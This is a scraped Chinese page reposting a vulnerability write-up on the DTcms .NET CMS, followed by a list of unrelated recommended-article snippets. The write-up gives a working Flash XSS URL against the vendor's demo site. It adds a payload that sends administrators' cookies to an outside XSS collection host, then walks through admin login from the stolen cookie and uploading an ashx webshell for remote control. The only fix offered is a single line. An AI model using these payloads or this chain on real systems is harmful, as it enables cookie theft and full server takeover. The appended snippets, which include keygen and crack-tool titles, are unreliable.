dtcms php,[.net学习]dtcms从前台Flash XSS到后台Getshell
DTcms:http://www.dtcms.net/index.aspx
一个开源.netcms,VS2010装MVC、编译发布、搭环境都花了半天,还好这个cms不要mssql,否则更麻烦。
扯点淡:来乌云也快一年了,一年里确实学到了很多知识。从最开始完全不懂PHP到现在能独立挖掘一些漏洞,写一些exp,也算是时间没有荒废。 然后,认识了一些基友,别人身上也学到很多自己不知道的东西。 期间也有过痛苦、开心、难过、兴奋,遇见过无耻的厂商,也收到过良心厂商的礼物。 还希望以后仍然能愉快地在乌云和各位喝个茶、聊个天,挖洞不在奖励的多少,学习是最重要。 初学.net架构,感觉这才是真正的“safe in default”,比如参数化查询、默认XSS防御机制,感觉挺好的,微软确实也是一个不错的厂商。希望以后学到更多.net的知识。 好不容易放暑假了,结果比上学还忙。只能大夜里看点代码,白天各种事。。。
之前提的一个任意文件删除。。。重复了。。。之后就一直没时间看
首先前台一个普通的flash xsshttp://demo.dtcms.net/scripts/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//
通过这个xss可以获得管理员cookie:http://www.test.com/scripts/swfupload/swfupload.swf?movieName=%22%5D)%7Dcatch(e)%7Bif(!window.x)%7Bwindow.x%3D1%3B(function()%7B(new%20Image()).src%3D'http%3A%2F%2Fxssan.com%2Findex.php%3Fdo%3Dapi%26id%3DSSI7Wt%26cookie%3D'%2Bescape(document.cookie)%3B%7D)()%3B%7D%7D%2F%2F
然后,这个cms有点奇葩的就是,虽然session id是http only的,但cookie中还有管理员的账号密码(加密过),没有http only的,如上图:AdminName=DTcms=admin;AdminPwd=DTcms=BB59946C93C0DEE8082F292B3A0FC7FF
cookie中包含这个AdminName和AdminPwd就可以登录后台。
登录了后台,怎么拿shell?
后台可以修改文件上传类型:
虽然在上传的时候限制了不能上传{ "asp", "aspx", "php", "jsp", "htm", "html" },这些文件:
不过明显还有很多方法突破:
1.IIS6下可以用解析漏洞
2.未限制ashx/asa等格式,可以直接传一个ashx webshell。
然后本地构造一个上传单页,向http://www.test.com/tools/upload_ajax.ashx 处上传即可:
官网演示站:
演示站后台没有设置后缀名的权限,我就不在演示站测试了。
本地测试一下即可。
增加ashx后缀:
上传:
菜刀连接:
修复方案:
删除没用的swf
dtcms php,[.net学习]dtcms从前台Flash XSS到后台Getshell相关推荐
- Flash XSS 学习整理
0x00 Flash XSS 本来想放弃的,问了大佬,还是说可以研究下...所以硬着头皮来弄了. 什么是flash xss? xss一是指执行恶意js,那flash xss呢?是因为flash有可以调 ...
- 基于JAVA在线学习跟踪系统前台计算机毕业设计源码+系统+mysql数据库+lw文档+部署
基于JAVA在线学习跟踪系统前台计算机毕业设计源码+系统+mysql数据库+lw文档+部署 基于JAVA在线学习跟踪系统前台计算机毕业设计源码+系统+mysql数据库+lw文档+部署 本源码技术栈: ...
- vuecli 实战商城后台管理系统_前台商城系统及后台管理系统
概述内容 mall项目是一套电商系统,包括前台商城系统及后台管理系统,基于SpringBoot+MyBatis实现. 前台商城系统包含首页门户.商品推荐.商品搜索.商品展示.购物车.订单流程.会员中心 ...
- HTML编程、网站前台设计、网站后台开发
HTML编程.网站前台设计.网站后台开发 HTML5是HTML最新的修订版本,2014年10月由万维网联盟(W3C)完成标准制定,是最新的网页编程语言标准,符合当代的网络需求.广义论及HTML5时,实 ...
- DDD进阶_一文带你搞定什么是前台、中台、后台
DDD从入门到精通,系列文章传送地址,请点击本链接. 目录 一.中台和平台的关系 二.什么是中台? 三.数字化转型中台应该共享什么? 四.如何实现前中后台的协同? 1. 前台 2. 中台 3. 后台 ...
- django 返回ajax html,Django 前台通过json 取出后台数据
前台通过json 取出后台数据 步骤1:后台数据通过 JSON 序列化成字符串 注意:1.json是1个字符串 2.通过json.dumps('xxx') 序列化成 1个字符串的 '字典对象' vie ...
- gulimall(谷粒商城) 是一个综合性的B2C平台,包括前台商城系统以及后台管理系统
介绍: 项目介绍 gulimall(谷粒商城) 项目是一套电商项目,包括前台商城系统以及后台管理系统,基于 SpringCloud + SpringCloudAlibaba + MyBatis-Plu ...
- ssm框架中前台html如何接受后台的数据_计算机毕业设计中实现java后台的微信小程序...
点击上方"蓝字",关注我们. 毕业设计做微信小程序+java后台.从对微信小程序一无所知到完成毕设,碰到许多问题,在跟大家分享一下自己的经历和一个小程序怎么从零开始.希望小程序初学 ...
- 说说Android的广播(4) - 前台队列为什么比后台队列快?
说说Android的广播(4) - 前台队列为什么比后台队列快? 前台队列为什么比后台队列快 讨论超时的细节之前,我们先讲讲对应用开发有帮助的,为什么前台队列比后台队列要快? 应用开发的同学在给系统团 ...
- 前台ajax请求php后台返回成功却进error方法解决
前台ajax请求php后台返回成功却进error方法解决 参考文章: (1)前台ajax请求php后台返回成功却进error方法解决 (2)https://www.cnblogs.com/anniey ...
最新文章
- justify-content与align-items解析
- COM组件与.NET技术对比
- 32f407tim4时钟源频率_华为以太时钟同步原理介绍(一)
- [摘译]js内存泄漏常见的四种情况
- C语言库函数WindowsSDK...
- 开源边缘计算平台研究分析
- 从链家网上爬取租房数据并进行数据分析
- 我在日本最大的房地产信息网站做重构
- 【FPGA入门教程】(七)FSM(Finite State Machine,有限状态机)设计
- 计算机在医学影像学的应用,计算机图像数字化与医学影像学之应用探析
- 垂直居中对齐四种样式
- 想进国企央企,一定要保存好所有工作履历证明材料,包括劳动合同、离职证明、社保记录等!...
- 基于websocket的网页实时消息推送与在线聊天(上篇)
- 史上最全的各种鱼的做法,爱吃鱼的可不要错过哦!
- 利用Python暴力破解邻居家WiFi密码
- 计算机控制系统的框图,计算机控制系统软件框图
- 蓝桥杯 青蛙跳杯子【第八届】【省赛】【C组】 BFS 广搜
- 虚拟机-问题-Ubuntu安装VMware Tools
- C++STL常用操作之prev、next篇
- oracle数据库的导入与导出
热门文章
- 德清租房软件测试,门头沟实习生出租房
- (45.2)【端口漏洞发现】扫描工具Nmap、Nessus、Masscan、端口弱口令检查
- 2019-05-22 SQL注入;啊D注入工具;
- 小马哥杂牌机高仿机刷机教程---史上最简单的卡刷方法。adb推送模式自动卡刷教程
- confluence挖矿病毒(kdevtmpfsi 、solrd)解决
- 360安全桌面 v2.7.0.1060 官方版
- phpdesigner(php开发工具) 注册码,php 开发工具 phpDesigner7 附注册机
- 在windows系统下制作虚拟软驱
- ubuntu 安装 TM2009 QQ2013
- 对联广告代码效果大全